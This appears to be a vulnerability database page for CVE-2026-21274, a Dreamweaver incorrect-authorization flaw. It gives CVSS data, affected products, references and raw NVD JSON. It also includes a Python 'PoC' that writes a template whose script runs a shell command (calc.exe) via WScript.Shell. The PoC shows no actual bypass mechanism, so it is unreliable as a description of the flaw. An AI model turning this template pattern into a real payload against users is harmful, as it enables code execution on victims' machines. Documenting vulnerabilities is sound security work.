CVE-2026-21274

Description

Dreamweaver Desktop versions 21.6 and earlier are affected by an Incorrect Authorization vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could leverage this vulnerability to bypass security measures and execute unauthorized code. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:dreamweaver:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE

Adobe Dreamweaver Desktop <= 21.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-21274 PoC - Malicious Dreamweaver Template File
# This PoC demonstrates the structure of a malicious .dwt file
# that could trigger arbitrary code execution via authorization bypass

import os

def create_malicious_dwt():
    """
    Create a malicious Dreamweaver template file (.dwt)
    that exploits the authorization bypass vulnerability
    """
    
    malicious_content = '''<!-- TemplateBeginEditable name="head" -->
<script>
// Malicious JavaScript code execution
// This demonstrates the authorization bypass in Dreamweaver
// When opened in Dreamweaver, this template can execute arbitrary code

// Example: Execute system commands via ActiveXObject (Windows)
try {
    var shell = new ActiveXObject("WScript.Shell");
    // Example command - would be replaced with actual malicious payload
    shell.Run("calc.exe", 1, false);
} catch(e) {
    console.log("Exploitation attempt detected");
}
</script>
<!-- TemplateEndEditable -->

<html>
<head>
    <!-- TemplateBeginEditable name="doctitle" -->
    <title>Malicious Template</title>
    <!-- TemplateEndEditable -->
</head>
<body>
    <!-- TemplateBeginEditable name="content" -->
    <div>Compromised by CVE-2026-21274</div>
    <!-- TemplateEndEditable -->
    
    <!--
    Attack Vector:
    1. Attacker creates malicious .dwt file with embedded code
    2. Victim opens file in Dreamweaver Desktop <= 21.6
    3. Dreamweaver fails to properly validate file authorization
    4. Malicious code executes in user context
    -->
</body>
</html>
'''
    
    filename = "malicious_template.dwt"
    with open(filename, 'w', encoding='utf-8') as f:
        f.write(malicious_content)
    
    print(f"[+] Created malicious file: {filename}")
    print(f"[+] File size: {os.path.getsize(filename)} bytes")
    print("\n[!] This PoC is for educational and security research purposes only")
    
    return filename

if __name__ == "__main__":
    create_malicious_dwt()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21274
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21274
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21274/
[4] VulDB https://vuldb.com/cve/CVE-2026-21274
[5] https://helpx.adobe.com/security/products/dreamweaver/apsb26-01.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21274", "sourceIdentifier": "[email protected]", "published": "2026-01-13T19:16:24.863", "lastModified": "2026-01-14T20:49:03.450", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dreamweaver Desktop versions 21.6 and earlier are affected by an Incorrect Authorization vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could leverage this vulnerability to bypass security measures and execute unauthorized code. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}, {"lang": "es", "value": "Las versiones 21.6 y anteriores de Dreamweaver Desktop se ven afectadas por una vulnerabilidad de autorización incorrecta que podría resultar en la ejecución de código arbitrario en el contexto del usuario actual. Un atacante podría aprovechar esta vulnerabilidad para eludir las medidas de seguridad y ejecutar código no autorizado. La explotación de este problema requiere interacción del usuario, en el sentido de que la víctima debe abrir un archivo malicioso."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:dreamweaver:*:*:*:*:*:*:*:*", "versionEndExcluding": "21.7", "matchCriteriaId": "18B387B5-7F08-419A-B3EC-3CB93C7E9288"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/dreamweaver/apsb26-01.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}